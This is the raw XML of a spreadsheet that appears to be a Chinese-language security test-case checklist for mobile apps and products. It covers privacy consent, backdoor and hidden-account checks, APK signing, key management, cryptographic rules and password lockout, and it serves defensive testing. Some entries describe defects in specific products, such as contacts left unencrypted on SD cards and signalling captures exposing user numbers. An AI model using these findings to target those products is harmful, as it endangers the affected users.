
<file path=[Content_Types].xml><?xml version="1.0" encoding="utf-8"?>
<Types xmlns="http://schemas.openxmlformats.org/package/2006/content-types">
  <Default Extension="bin" ContentType="application/vnd.openxmlformats-officedocument.spreadsheetml.printerSettings"/>
  <Default Extension="png" ContentType="image/png"/>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90" windowWidth="19200" windowHeight="11640" activeTab="1"/>
  </bookViews>
  <sheets>
    <sheet name="修订记录表" sheetId="2" r:id="rId1"/>
    <sheet name="测试用例" sheetId="1" r:id="rId2"/>
  </sheets>
  <definedNames>
    <definedName name="_xlnm._FilterDatabase" localSheetId="1" hidden="1">测试用例!$A$1:$K$971</definedName>
    <definedName name="ExternalData_1" localSheetId="1">测试用例!$A$1:$J$883</definedName>
  </definedNames>
  <calcPr calcId="125725"/>
</workbook>
</file>

<file path=xl/connections.xml><?xml version="1.0" encoding="utf-8"?>
<connections xmlns="http://schemas.openxmlformats.org/spreadsheetml/2006/main">
  <connection id="1" name="s.xlsx" type="6" refreshedVersion="5" background="1" saveData="1">
    <textPr prompt="0" codePage="936" sourceFile="D:\temp\a\s.xlsx.txt">
      <textFields>
        <textField/>
      </textFields>
    </textPr>
  </connection>
</connections>
</file>

<file path=xl/sharedStrings.xml><?xml version="1.0" encoding="utf-8"?>
<sst xmlns="http://schemas.openxmlformats.org/spreadsheetml/2006/main" count="8322" uniqueCount="4343">
  <si>
    <t>'001 无录音监听功能</t>
  </si>
  <si>
    <t>Level 1</t>
  </si>
  <si>
    <t>安全性测试</t>
  </si>
  <si>
    <t>'002 无短信监听功能</t>
  </si>
  <si>
    <t>'001 在客户资料或系统界面中提供隐私声明</t>
  </si>
  <si>
    <t>产品或服务必须在客户资料或界面中提供隐私声明</t>
  </si>
  <si>
    <t>'1、系统有收集个人数据的场景和行为</t>
  </si>
  <si>
    <t>'002 收集个人数据必须获得数据主体授权</t>
  </si>
  <si>
    <t>对于数据控制者，收集个人数据必须要获得数据主体的授权</t>
  </si>
  <si>
    <t>'003 个人数据收集范围和使用目的不得超出隐私声明</t>
  </si>
  <si>
    <t>个人数据收集范围、使用目的不得超出隐私声明</t>
  </si>
  <si>
    <t>问题1（一般）：产品提供抓包功能，通过版本提供的工具与系统的RCP命令配置配合实现。抓包功能跟对于媒体消息能够不捕获媒体报文载荷，从而保护用户通话信息。而对于信令消息，提供的是报文长度可配的方式从0~1047字节，通过rcp signaling capture-payload-length命令用来配置远程抓包时捕获的信令报文最大载荷长度。信令报文通过长度控制，如果设置足够大，可能会暴露用户的个人信息，比如用户号码（IMPU/IMPI）sip:123456789@huwei.com、终端IP地址、MAC地址等，目前系统没有专门对这些信息的匿名化能力。</t>
  </si>
  <si>
    <t>'004 收集个人数据列表及收集目的要求</t>
  </si>
  <si>
    <t>必须在设计文档中列出所收集的个人数据列表，标明个人数据的收集目的及保护措施</t>
  </si>
  <si>
    <t>应用软件需要连接到互联网，数据控制者须在连接前告知数据主体，并提供获得数据主体同意的机制</t>
  </si>
  <si>
    <t>检查提供数据主体录入个人数据功能或特性是否提供了查询和更新相应个人数据的机制</t>
  </si>
  <si>
    <t>存在提供数据主体录入个人数据的功能或特性</t>
  </si>
  <si>
    <t>对于需要为第三方提供用户数据的必须功能或特性，用户户数据提供给第三方前必须获得用户授权</t>
  </si>
  <si>
    <t>存在为第三方提供用户数据的必须特性或功能</t>
  </si>
  <si>
    <t>必须提供在设备维修、销毁需要移出网络或云资源回收场景下存储的个人数据进行安全销毁的机制</t>
  </si>
  <si>
    <t>存在设备维修、销毁或资源回收的场景</t>
  </si>
  <si>
    <t>问题1（致命）：WIFI直连应用（HwWiFiDirect），导入联系时将联系人信息永久暴露在SD卡存储区，没有对联系人文件进行访问控制和加密保护，文件永久存在，容易被恶意应用读取和篡改。建议：（1）数据存放在data\data\..目录下，并采用数据库provider访问方式 （2）设置访问权限，定位为华为的自定义permission.  (3) 导入联系人完毕时，推荐将临时数据文件Vcard.vcf删除。</t>
  </si>
  <si>
    <t>A1</t>
  </si>
  <si>
    <t>'001 不存在特殊方式登录客户端</t>
  </si>
  <si>
    <t>'1、不存在特殊方法登录客户端</t>
  </si>
  <si>
    <t>'002 不存在未知的账户</t>
  </si>
  <si>
    <t>'003 不存在无法更改的口令</t>
  </si>
  <si>
    <t>'004 不提供的功能需要硬删除代码或注释</t>
  </si>
  <si>
    <t>'005 非查询操作日志记录</t>
  </si>
  <si>
    <t>'006 禁止不经认证直接访问系统的接口</t>
  </si>
  <si>
    <t>'007 禁止不可管理的认证/访问方式</t>
  </si>
  <si>
    <t>'008 禁止空口令</t>
  </si>
  <si>
    <t>'009 禁止隐秘访问方式</t>
  </si>
  <si>
    <t>'010 客户端无特殊接口使得能够被远程控制</t>
  </si>
  <si>
    <t>'1、不存在后台远程控制的接口</t>
  </si>
  <si>
    <t>'011 账号不能写死在代码中</t>
  </si>
  <si>
    <t>'012 资料中需要写明客户端提供的命令、参数、接口</t>
  </si>
  <si>
    <t>'001 应用不可在用户未知的前提下自行打开产品的无线连接状态</t>
  </si>
  <si>
    <t>'2、如果应用使用过程中不具有修改状态的提示，则手机的wifi，BT，wifi热点，蓝牙共享网络，Wif direct，GPS等无线接口的状态不应该被更改</t>
  </si>
  <si>
    <t>'002 应用端口扫描</t>
  </si>
  <si>
    <t>'2、检查第二步的测试结果，除去未开启该应用就存在的端口，其他端口都应包含在产品通信矩阵中且是合理的</t>
  </si>
  <si>
    <t>'003 数字证书认证要求</t>
  </si>
  <si>
    <t>'1、支持证书认证协议的双方运行正常</t>
  </si>
  <si>
    <t>数字证书认证常见于IPSec，SSL/TLS，EAP-TLS等安全协议，在这些协议中，依靠数字证书认证对端的身份，如果配置的证书不合法、证书私钥泄露、证书校验不当等问题会增加仿冒的风险。</t>
  </si>
  <si>
    <t>'004 证书认证中的CRL验证</t>
  </si>
  <si>
    <t>由于私钥泄露等安全原因，证书颁发机构可能会在证书过期前吊销证书。一般是通过证书吊销列表（CRL）来发布被吊销证书的信息。</t>
  </si>
  <si>
    <t>'005 绕过认证的隐秘通道</t>
  </si>
  <si>
    <t>'1、获取产品代码</t>
  </si>
  <si>
    <t>'1、产品不存在隐秘的通道可以绕过认证，直接登陆系统。</t>
  </si>
  <si>
    <t>产品应禁止存在绕过正常认证机制直接进入到系统的隐秘通道。</t>
  </si>
  <si>
    <t>'006 不安全的访问通道</t>
  </si>
  <si>
    <t>系统使用Telnet来认证用户</t>
  </si>
  <si>
    <t>'1、检查认证用户的方式是否没有使用SSH的方式而使用Telnet的。</t>
  </si>
  <si>
    <t>使用SSH来认证用户</t>
  </si>
  <si>
    <t>应用系统使用Telnet来认证用户被认为是不安全的，因为telnet是未加密传输，应该使用SSH的方式对用户认证。</t>
  </si>
  <si>
    <t>'001 至少使用两款业界主流防病毒软件扫描软件包</t>
  </si>
  <si>
    <t>'1、在VMP上找到所测试的版本，目录中有杀毒软件对软件包和文档进行病毒扫描的结果，检查这些扫描结果</t>
  </si>
  <si>
    <t>'1、病毒扫描报告无告警，无病毒、木马等报警，保证软件包中未感染或嵌入病毒/木马。防病毒软件名称及软件版本、病毒库版本、扫描时间、扫描结果需要存档。如果防病毒软件产生告警，必需进行规避以消除告警</t>
  </si>
  <si>
    <t>提交转测试电子流时，系统会默认勾选ALL：即使用Avira，Kav，MCAfee，OSCE，Symantec对所有软件包和文档进行病毒扫描，测试经理不需要勾选和扫描，只需检查结果</t>
  </si>
  <si>
    <t>'002 McAfee Android版扫描apk</t>
  </si>
  <si>
    <t>安全测试报告第三方应用安全静态扫描报告章节，需要提供相应报告</t>
  </si>
  <si>
    <t>'003 检查APK的签名</t>
  </si>
  <si>
    <t>'004 没有采用Android原生系统的签名</t>
  </si>
  <si>
    <t>PC已通过adb连接到设备；已从备注路径中拷贝AndroidSigned.apk到本地</t>
  </si>
  <si>
    <t>'1、使用adb install的方式尝试安装这个APK</t>
  </si>
  <si>
    <t>'1、安装失败，提示：INSTALL_FAILED_SHARED_USER_INCOMPATIBLE。若能安装成功则说明当前系统是采用Android原生签名的，非常危险！</t>
  </si>
  <si>
    <t>'005 安装未经过签名的apk</t>
  </si>
  <si>
    <t>'1、被测apk未签名</t>
  </si>
  <si>
    <t>'2、安装失败</t>
  </si>
  <si>
    <t>'006 安装与系统共享uid但签名不一致的apk</t>
  </si>
  <si>
    <t>“\\pekrnd-fs\pek01\TC_SMARTPHONE_F\ResourceFolder\Test\06 测试资源\09 APK资源\手机安全Security”目录取HelloJack_release.apk</t>
  </si>
  <si>
    <t>'007 升级应用被篡改过的apk</t>
  </si>
  <si>
    <t>'3.被篡改的apk不能成功安装</t>
  </si>
  <si>
    <t>'008 升级应用，签名不一致</t>
  </si>
  <si>
    <t>'009 升级应用，签名一致</t>
  </si>
  <si>
    <t>'010 自研应用签名检查</t>
  </si>
  <si>
    <t>'1、测试用PC机已经配置JDK环境</t>
  </si>
  <si>
    <t>'011 预制的第三方应用签名检查</t>
  </si>
  <si>
    <t>'2、对于预制的第三方应用，有第三方公司的签名信息，不能出现debug的签名（签名信息中含有debug字样，如CN=Android Debug等）。姓名、部门或公司名称这三项中需保证至少有一项不为空，且需保证所填信息真实有效，不能为网址、乱码等无效信息。（且对于非谷歌官方的应用，不得采用Android公开证书，即出现类似这些信息：Android/emailAddress=android@android.com）</t>
  </si>
  <si>
    <t>'012 恶意短信扣费</t>
  </si>
  <si>
    <t>'1、已插入有效SIM卡</t>
  </si>
  <si>
    <t>'013 恶意广告检查</t>
  </si>
  <si>
    <t>'1、有现网的数据连接</t>
  </si>
  <si>
    <t>'3、检查应用是否会存在有：匿名或频繁推送广告；未经用户允许在通知栏弹出广告；广告无法关闭；主动弹出用户无法关闭的对话框引导或强制用户进行软件下载预装或业务定制等情况</t>
  </si>
  <si>
    <t>'014 恶意流量消耗</t>
  </si>
  <si>
    <t>'1、打开应用，静置不用，经过24小时</t>
  </si>
  <si>
    <t>'1、在setting中查看流量，该应用的流量不能超过1M</t>
  </si>
  <si>
    <t>'015 自动升级前的提示</t>
  </si>
  <si>
    <t>'1-2、提示用户是否需要升级以及升级可能的影响，不允许在用户不知情的情况下自动升级，且在线升级检查升级包更新的频率不能过于频繁，不能多于1次/天。</t>
  </si>
  <si>
    <t>'001 检查代码中的关键字</t>
  </si>
  <si>
    <t>'2、没有搜索到两个字典文件中的关键字，直接pass；反之如果搜索到了，需要确认代码是否打印了密码、敏感信息、隐私信息等等不允许打印的内容。</t>
  </si>
  <si>
    <t>搜索关键字字典.txt和华为密码字典.txt</t>
  </si>
  <si>
    <t>'002 检查日志中是否记录认证信息</t>
  </si>
  <si>
    <t>日志文件中不应该记录任何形式的登录凭证等信息，例如口令的明文或密文，用户登录之后的cookie信息，key等。</t>
  </si>
  <si>
    <t>'1.日志文件中不应该记录任何形式的登录凭证等信息。</t>
  </si>
  <si>
    <t>'003 日志文件中不存在明文的敏感数据</t>
  </si>
  <si>
    <t>'004 对敏感信息的访问要有认证</t>
  </si>
  <si>
    <t>敏感数据的访问要进行认证</t>
  </si>
  <si>
    <t>产品必须解析出所有需要访问敏感信息的地方。</t>
  </si>
  <si>
    <t>'005 应用的数据文件other组权限检查</t>
  </si>
  <si>
    <t>'1.目标系统运行正常</t>
  </si>
  <si>
    <t>'1、除了.so、.lib外所有文件的other组权限属性为---，即other组权限为空</t>
  </si>
  <si>
    <t>'006 应用在内外SD卡的敏感数据检查</t>
  </si>
  <si>
    <t>'007 敏感数据的传输</t>
  </si>
  <si>
    <t>'008 自研app传输过程中SSL加密，不能使用RC4加密</t>
  </si>
  <si>
    <t>'2、无RC4相关的Cipher Suite</t>
  </si>
  <si>
    <t>自研app使用华为服务器</t>
  </si>
  <si>
    <t>'009 其他app传输过程中SSL加密，加密算法RC4不在第一个</t>
  </si>
  <si>
    <t>'2、加密算法RC4相关的Cipher Suite不在列表首位</t>
  </si>
  <si>
    <t>app的服务器非自研</t>
  </si>
  <si>
    <t>'001 密钥分层管理至少选择两层结构进行管理</t>
  </si>
  <si>
    <t>密钥分层管理至少选择两层结构进行管理</t>
  </si>
  <si>
    <t>'1.检查密钥使用和密钥管理是否符合要求</t>
  </si>
  <si>
    <t>'002 手动输入的值不可直接作为密钥使用</t>
  </si>
  <si>
    <t>手动输入的值，不可直接作为密钥使用</t>
  </si>
  <si>
    <t>'1、通过源代码分析，检查密钥生成的方式是否符合要求：没有将用户从键盘输入的值直接或间接作为加密密钥使用（如：使用用户从键盘输入的值和固定的字符串（如：全0、全1）连接后作为密钥使用）</t>
  </si>
  <si>
    <t>'1、密钥生成没有直接或间接使用从用户输入的值</t>
  </si>
  <si>
    <t>'003 密钥协商过程使用身份认证机制保护</t>
  </si>
  <si>
    <t>密钥协商过程使用身份认证机制保护</t>
  </si>
  <si>
    <t>密钥协商目的是使通信双方协商出用于数据加密和完整性保护所需的密钥，从而安全的传输数据。如果密钥协商的一方不是守信方而是攻击者，一旦攻击者通过密钥协商获取了解密密钥，所有密文传输的敏感信息都可以被攻击者解密，数据加密传输安全机制就会完全失效，所以密钥协商之前必须验证通信双方的身份，避免和冒充的攻击者协商密钥造成敏感信息泄露。DH算法进行密钥协商没有身份认证机制，因此在进行密钥协商前需要进行身份认证</t>
  </si>
  <si>
    <t>'004 密钥的用途需单一化</t>
  </si>
  <si>
    <t>密钥的用途需单一化</t>
  </si>
  <si>
    <t>'1、密钥的用途单一化，符合要求</t>
  </si>
  <si>
    <t>'005 密钥须支持可更新</t>
  </si>
  <si>
    <t>密钥须支持可更新，在一次性可编程的芯片中保存的密钥除外</t>
  </si>
  <si>
    <t>'1、系统中存储密钥</t>
  </si>
  <si>
    <t>'1、密钥支持可更新，符合要求</t>
  </si>
  <si>
    <t>'006 代码中不存在硬编码的加密密钥</t>
  </si>
  <si>
    <t>敏感数据加密和传输加密的密钥，禁止硬编码在代码中，需要加密保存在配置文件或者数据库中。</t>
  </si>
  <si>
    <t>'007 密钥本地存储时需提供机密性保护</t>
  </si>
  <si>
    <t>密钥存储时必须提供机密性保护</t>
  </si>
  <si>
    <t>'1、密钥存储时提供机密性保护，符合要求</t>
  </si>
  <si>
    <t>'008 密钥本地存储时需提供完整性保护</t>
  </si>
  <si>
    <t>密钥在本地存储时需提供完整性保护</t>
  </si>
  <si>
    <t>'1、密钥存储时提供完整性保护，符合要求</t>
  </si>
  <si>
    <t>'009 密钥组件需分散存储，并对存储的文件名进行一般化处理</t>
  </si>
  <si>
    <t>采用密钥组件方式生成根密钥时，密钥组件需要分散存储，当密钥组件存储于文件中时，须对文件名做一般化处理</t>
  </si>
  <si>
    <t>'1、密钥组件需分散存储，并对存储的文件名进行一般化处理。</t>
  </si>
  <si>
    <t>'010 密钥需要提供备份与恢复机制</t>
  </si>
  <si>
    <t>应依据具体场景，来评估是否需要对密钥提供备份与恢复机制</t>
  </si>
  <si>
    <t>'1、密钥提供备份与恢复机制，符合要求</t>
  </si>
  <si>
    <t>'011 不再使用的密钥应当立即删除</t>
  </si>
  <si>
    <t>不再使用的密钥应当立即删除</t>
  </si>
  <si>
    <t>'1、不再使用的密钥立即删除，符合要求</t>
  </si>
  <si>
    <t>'012 对密钥的操作需记录详细日志</t>
  </si>
  <si>
    <t>密钥的生成、使用、更新、销毁等操作需记录详细的日志</t>
  </si>
  <si>
    <t>'1、系统中对密钥进行生成、使用、更新、销毁等操作</t>
  </si>
  <si>
    <t>'1、密钥的生成、使用、更新、销毁等操作有详细的日志记录</t>
  </si>
  <si>
    <t>'013 密钥传输时需提供机密性、完整性保护</t>
  </si>
  <si>
    <t>密钥传输时需提供机密性、完整性保护</t>
  </si>
  <si>
    <t>'1、对称密钥、共享秘密等密钥信息在非信任网络中传输</t>
  </si>
  <si>
    <t>'1、密钥传输时提供了机密性、完整性保护</t>
  </si>
  <si>
    <t>'014 预置私钥不允许导出</t>
  </si>
  <si>
    <t>'1、产品不提供导出华为预置证书私钥的接口，不能通过任何方式获取预置的私钥。</t>
  </si>
  <si>
    <t>PKI证书及数字签名是身份认证的有效技术手段，法律上也承认数字签名具备证明签发者身份的法律效应。而证书及数字签名中用于证明自身身份的关键是私钥。一旦私钥泄露，恶意攻击者可进行身份仿冒，冒充合法用户实施攻击。因此，产品预置的华为证书私钥不允许导出，防止身份滥用。</t>
  </si>
  <si>
    <t>'015 证书及密钥对可替换</t>
  </si>
  <si>
    <t>'1、产品支持证书替换功能，并在产品资料中提示风险，建议使用者替换成自己的证书和密钥对。</t>
  </si>
  <si>
    <t>PKI证书及数字签名是身份认证的有效技术手段，法律上也承认数字签名具备证明签发者身份的法律效应。而证书及数字签名中用于证明自身身份的关键是私钥。一旦私钥泄露，恶意攻击者可进行身份仿冒，冒充合法用户实施攻击。因此，需要使用证书功能的产品，应该支持证书替换功能。</t>
  </si>
  <si>
    <t>'016 证书私钥的加密存储</t>
  </si>
  <si>
    <t>产品应支持按标准格式(如PKCS系列标准)对证书私钥进行保存和加密。使用基于口令的加密机制（如PBES2）时，口令应支持用户修改且符合口令复杂度要求，并在设备上加密存储。</t>
  </si>
  <si>
    <t>'001 禁止使用私有加密算法</t>
  </si>
  <si>
    <t>'1.获取测试对象设计文档及代码</t>
  </si>
  <si>
    <t>'002 不安全的加密方式</t>
  </si>
  <si>
    <t>检查整个系统中是否有使用不安全的加密方式</t>
  </si>
  <si>
    <t>'003 根密钥与工作密钥的生成安全</t>
  </si>
  <si>
    <t>采用密钥分层管理结构时，检查根密钥与工作密钥的生成是否安全</t>
  </si>
  <si>
    <t>'004 根密钥与工作密钥的使用安全</t>
  </si>
  <si>
    <t>采用密钥分层管理结构时，检查根密钥与工作密钥的使用是否安全</t>
  </si>
  <si>
    <t>'005 证书签名算法</t>
  </si>
  <si>
    <t>检查系统生成或使用证书的签名算法是否满足安全要求</t>
  </si>
  <si>
    <t>'1、系统可以生成RSA签名的证书或有使用RSA签名证书</t>
  </si>
  <si>
    <t>'006 敏捷性的密码算法设计</t>
  </si>
  <si>
    <t>'007 使用安全随机函数</t>
  </si>
  <si>
    <t>'008 分组算法优先选择CBC模式</t>
  </si>
  <si>
    <t>'009 分组算法每次必需使用不可预测的IV值</t>
  </si>
  <si>
    <t>'010 使用安全的3DES密钥机制</t>
  </si>
  <si>
    <t>'011 使用AES分组密码算法来代替RC4流密码算法</t>
  </si>
  <si>
    <t>'012 使用RSA算法时要选取合适的公共指数e</t>
  </si>
  <si>
    <t>'013 RSA算法不选用PKCS1填充方式</t>
  </si>
  <si>
    <t>使用RSA算法进行加密操作时，应优先选择OAEP填充方式</t>
  </si>
  <si>
    <t>'1.RSA算法没有使用PKCS1填充方式，优先选择OAEP填充方式</t>
  </si>
  <si>
    <t>'014 非对称加密算法保护数据机密性时，禁止使用私钥加密数据</t>
  </si>
  <si>
    <t>使用非对称加密算法保护数据机密性时，禁止使用私钥加密数据</t>
  </si>
  <si>
    <t>'1.通过源代码分析，对使用非对称加密算法如RSA来保护机密数据的代码进行检视，检查是否使用私钥进行加密。</t>
  </si>
  <si>
    <t>'1.没有使用使用私钥加密数据</t>
  </si>
  <si>
    <t>'015 使用RSA算法时，非对称加密和签名要使用不同的密钥对</t>
  </si>
  <si>
    <t>使用RSA算法时，非对称加密和签名要使用不同的密钥对</t>
  </si>
  <si>
    <t>'1.通过源代码分析，在同一笔业务中，若既需要使用RSA加密又需要进行RSA签名，检查是否加密使用的公钥和签名使用的私钥来自同一个密钥对或同一个数字证书。</t>
  </si>
  <si>
    <t>'1.在同一笔业务中，非对称加密和签名使用不同的密钥对</t>
  </si>
  <si>
    <t>'016 使用DSA签名时签名的r、s值均不为0</t>
  </si>
  <si>
    <t>使用DSA签名时签名的r、s值均不为0</t>
  </si>
  <si>
    <t>'017 在同时进行加密和签名时，使用先签名后加密的方式</t>
  </si>
  <si>
    <t>在同时进行加密和签名时，使用先签名后加密的方式</t>
  </si>
  <si>
    <t>'1.通过源代码分析，检查密码算法函数调用次序，加密函数是否在签名函数的后面使用</t>
  </si>
  <si>
    <t>'1.在同时进行加密和签名时，使用先签名后加密的方式</t>
  </si>
  <si>
    <t>'018 不使用二进制域的ECDSA认证方式</t>
  </si>
  <si>
    <t>不使用二进制域的ECDSA认证方式</t>
  </si>
  <si>
    <t>椭圆曲线算法没有使用二进制域的ECDSA认证方式</t>
  </si>
  <si>
    <t>'019 RSA算法进行签名操作时采用PSS填充方式</t>
  </si>
  <si>
    <t>RSA算法进行签名操作时采用PSS填充方式</t>
  </si>
  <si>
    <t>'020 IPSEC中实现DH算法时应对双方交换的公共值的特殊值过滤</t>
  </si>
  <si>
    <t>IPSEC中实现DH算法时应对双方交换的公共值进行某些特殊值过滤，如0,1,P-1,P</t>
  </si>
  <si>
    <t>'1.通过源代码分析，检查在使用DH算法进行密钥协商的双方在接收到对方发送过来的“公钥”时，应判断公钥是不是0,1,p-1,p，这样的特殊值并要求重新发起密钥协商</t>
  </si>
  <si>
    <t>'1.代码中对特殊值的公钥有进行判断，并有重新发起密钥协商的流程。</t>
  </si>
  <si>
    <t>'021 禁止将hash(key||message)方式当作MAC来使用</t>
  </si>
  <si>
    <t>禁止将hash(key||message)方式当作MAC来使用</t>
  </si>
  <si>
    <t>'1.通过源代码分析，检查使用HMAC算法保护数据完整性的代码，是否使用hash(key||message)方式作为MAC值的产生</t>
  </si>
  <si>
    <t>'1.MAC值没有使用hash(key||message)方式产生</t>
  </si>
  <si>
    <t>'022 在同时进行加密操作和MAC计算时，需使用不同的密钥</t>
  </si>
  <si>
    <t>在同时进行加密操作和MAC计算时，要使用不同的密钥</t>
  </si>
  <si>
    <t>'1.通过源代码分析，检查加密运算和MAC运算的地方是否使用同一个对称密钥</t>
  </si>
  <si>
    <t>'1.加密操作和计算MAC操作没有使用同一个对称密钥</t>
  </si>
  <si>
    <t>'001 Fortify和Coverity源代码扫描</t>
  </si>
  <si>
    <t>'1、安全测试报告中源代码安全开发扫描分析报告章节(开发提供)，需要提供扫描结果</t>
  </si>
  <si>
    <t>'002 华为应用商店发布需经McAfee Android扫描检查</t>
  </si>
  <si>
    <t>'1、测试应用apk需要在华为应用商店发布</t>
  </si>
  <si>
    <t>'003 不存在恶意广告、吸费陷阱、恶意消息流量的行为</t>
  </si>
  <si>
    <t>'004 源代码混淆（DEX）</t>
  </si>
  <si>
    <t>B</t>
  </si>
  <si>
    <t>'005 源代码混淆（Smali）</t>
  </si>
  <si>
    <t>'001 口令长度是否有最小限制</t>
  </si>
  <si>
    <t>'1、检查在注册、登录、设置密码的页面，输入长度为5个字符的密码</t>
  </si>
  <si>
    <t>'1、小于6字符时，密码输入框后面无对勾，提示密码长度不够</t>
  </si>
  <si>
    <t>'002 口令长度是否有最大限制</t>
  </si>
  <si>
    <t>'1、在注册、登录、设置密码的页面，输入长度超过最大长度的密码，如20字符</t>
  </si>
  <si>
    <t>'1、界面上达到20位后禁止输入，密码位数在6-20间可成功设置密码</t>
  </si>
  <si>
    <t>'003 口令复杂度要求</t>
  </si>
  <si>
    <t>'004 显示口令强度并提示用户</t>
  </si>
  <si>
    <t>'005 关闭复杂度检查机制</t>
  </si>
  <si>
    <t>'1、如果产品支持用户关闭复杂度检查机制，应在CPI资料中提示风险。</t>
  </si>
  <si>
    <t>'006 修改口令防暴力破解措施</t>
  </si>
  <si>
    <t>'007 在不需要还原口令的场景，必须使用不可逆算法加密</t>
  </si>
  <si>
    <t>在不需要还原口令的场景，必须使用不可逆算法加密。</t>
  </si>
  <si>
    <t>'008 口令不以明文显示</t>
  </si>
  <si>
    <t>'009 口令输入框不支持拷贝</t>
  </si>
  <si>
    <t>'010 更改口令时要二次确认</t>
  </si>
  <si>
    <t>'011 用户修改口令的时候必须验证旧口令</t>
  </si>
  <si>
    <t>'1、当只输入新口令或者输入错误的旧口令时，密码修改都不能成功，只有旧口令验证通过才能修改新口令</t>
  </si>
  <si>
    <t>'012 不允许修改自身帐号以外的口令</t>
  </si>
  <si>
    <t>'013 口令传输必须加密</t>
  </si>
  <si>
    <t>'1、口令在传输过程中加密，使用HTTPS方式传输</t>
  </si>
  <si>
    <t>'014 口令在本地加密存储</t>
  </si>
  <si>
    <t>在帐户的数据文件中发现用户保存的口令是安全加密存储的。</t>
  </si>
  <si>
    <t>'015 防键盘监控</t>
  </si>
  <si>
    <t>'1、涉及密码输入弹出的键盘，都不应该弹出系统原生键盘，而是采用应用的软键盘</t>
  </si>
  <si>
    <t>'016 所有按键的声音无区别</t>
  </si>
  <si>
    <t>'1、所有按键的声音没有区别，根据声音无法区分是否是同一个按键</t>
  </si>
  <si>
    <t>'017 连续登录失败锁定帐号</t>
  </si>
  <si>
    <t>'018 连续登录失败成功锁定</t>
  </si>
  <si>
    <t>'019 服务器端锁定帐号</t>
  </si>
  <si>
    <t>'020 连续登录失败锁定策略的“允许连续失败的次数”可配置</t>
  </si>
  <si>
    <t>'1、连续登录失败锁定策略的“允许连续失败的次数”可配置，取值范围：有验证码机制的产品可以为0-*次（0表示不启动锁定功能），无验证码机制的产品未1-*次</t>
  </si>
  <si>
    <t>'021 连续失败次数指同一个帐号从最后一次登录成功以来登录失败的次数的累积值</t>
  </si>
  <si>
    <t>'022 锁定时长可配置</t>
  </si>
  <si>
    <t>'023 连续登录失败锁定策略执行并在锁定时间超时后自动解锁</t>
  </si>
  <si>
    <t>'024 不安全的用户名错误提示</t>
  </si>
  <si>
    <t>系统存在登录认证并且提供错误提示</t>
  </si>
  <si>
    <t>'1、输入错误或畸形的用户名尝试登录，检查错误提示是否显示用户名错误之类的具体信息。</t>
  </si>
  <si>
    <t>不显示用户名错误之类的具体错误信息，可显示模糊信息，如：认证错误等等</t>
  </si>
  <si>
    <t>系统在进行登录验证时，如果输入错误或畸形的用户名并且未输入密码，将提示用户名错误信息，这样会给攻击者有利的信息进行蛮力攻击，错误提示应模糊提示，不应具体。</t>
  </si>
  <si>
    <t>'025 缺省口令是否复合复杂度要求</t>
  </si>
  <si>
    <t>'1.应用程序存在用户注册、登陆功能，并采取了登陆验证机制。</t>
  </si>
  <si>
    <t>系统帐号的缺省口令（如操作系统、数据库、业务系统）应符合复杂度的要求。</t>
  </si>
  <si>
    <t>'026 使用安全的随机数算法</t>
  </si>
  <si>
    <t>'1、获取系统的设计文档。</t>
  </si>
  <si>
    <t>用于安全用途的随机数要使用安全的随机数发生器生成。</t>
  </si>
  <si>
    <t>'027 面向最终用户或消费类产品的默认口令检查</t>
  </si>
  <si>
    <t>面向最终用户/消费类的产品（如家庭以太网接入设备）在保证用户体验的同时，也应修改默认口令。否则攻击者可通过远程登录的功能利用默认口令登录设备</t>
  </si>
  <si>
    <t>'028 口令认证固定密码</t>
  </si>
  <si>
    <t>被测对象源码可获得</t>
  </si>
  <si>
    <t>通过源码分析检查程序中是否存在口令硬编码</t>
  </si>
  <si>
    <t>'001 widget入口启动应用，检查是否跳过用户协议界面或直接产生后台行为</t>
  </si>
  <si>
    <t>'1、不会检测到敏感权限，若能检测到敏感权限，在敏感权限调用前需要弹出相关提示，可以是用户协议/图标/文字</t>
  </si>
  <si>
    <t>'002 从其他应用入口启动应用，检查是否跳过用户协议界面或直接产生后台行为</t>
  </si>
  <si>
    <t>'003 从通知栏入口启动应用，检查是否跳过用户协议界面或直接产生后台行为</t>
  </si>
  <si>
    <t>'3、可以显示用户协议界面，并且在用户协议界面不会有LBE弹框提示</t>
  </si>
  <si>
    <t>'004 第一次进入应用不勾选下次不再提示，检查第二次进入应用后的用户协议界面后台行为</t>
  </si>
  <si>
    <t>有些应用在用户协议界面点击退出后，并不是真正的退出，而是退到后台。而此时再次进入应用，却有用户协议，在用户协议界面有联网，这是不允许的。</t>
  </si>
  <si>
    <t>'005 检查第三方应用“用户协议”的勾选框</t>
  </si>
  <si>
    <t>'1、应用包含用户协议界面</t>
  </si>
  <si>
    <t>'006 检查用户协议的描述</t>
  </si>
  <si>
    <t>'007 检查用户协议的权限声明符合实际</t>
  </si>
  <si>
    <t>'008 检查用户协议界面开启无线开关和GPS开关，是否后台联网和定位</t>
  </si>
  <si>
    <t>'009 检查用户协议中的链接联网</t>
  </si>
  <si>
    <t>'1、检查用户协议是否有联网链接</t>
  </si>
  <si>
    <t>'1、当前只有华为隐私声明的链接，可以不用提醒。其他链接，若点击后会联网的话，需要明示用户，用户确定后才能打开链接</t>
  </si>
  <si>
    <t>'010 检查用户协议中的自动更新</t>
  </si>
  <si>
    <t>'011 卡不在位，无线开关未开启，检查是否跳过用户协议界面或直接产生后台行为</t>
  </si>
  <si>
    <t>'1、首次进入应用，查看是否显示用户协议界面</t>
  </si>
  <si>
    <t>'1、可以显示用户协议界面，不会跳过提示界面</t>
  </si>
  <si>
    <t>'012 用户协议的内容需正面提示</t>
  </si>
  <si>
    <t>'1、首次进入应用，在用户协议界面，观察敏感权限的用途和使用场景说明是否为正面提示</t>
  </si>
  <si>
    <t>不建议批量明示，也就是具体的敏感行为在实际用到的时候提示比较好，明示要说明场景、目的、行为</t>
  </si>
  <si>
    <t>'013 用户协议界面，在未经用户确认前不发生后台敏感动作</t>
  </si>
  <si>
    <t>'1、首次进入用户协议，在用户协议界面静置5分钟，观察LBE是否可以检测到后台行为</t>
  </si>
  <si>
    <t>'1、用户协议界面未点击确定前，LBE不会检测到联网，定位，读联系人，读彩信等后台行为</t>
  </si>
  <si>
    <t>'014 在用户协议界面，取消后不能发生后台敏感动作</t>
  </si>
  <si>
    <t>'1-2、LBE不会检测到联网，定位，读联系人，读彩信等后台行为</t>
  </si>
  <si>
    <t>'001 检查后台读取联系人行为</t>
  </si>
  <si>
    <t>'1、LBE对后台读取联系人行为进行监控</t>
  </si>
  <si>
    <t>'002 检查后台修改联系人行为</t>
  </si>
  <si>
    <t>'1、手机中有手机管家，且手机管家中对应用的修改联系人设置为“提示”</t>
  </si>
  <si>
    <t>该行为对应权限android.permission.WRITE_CONTACTS</t>
  </si>
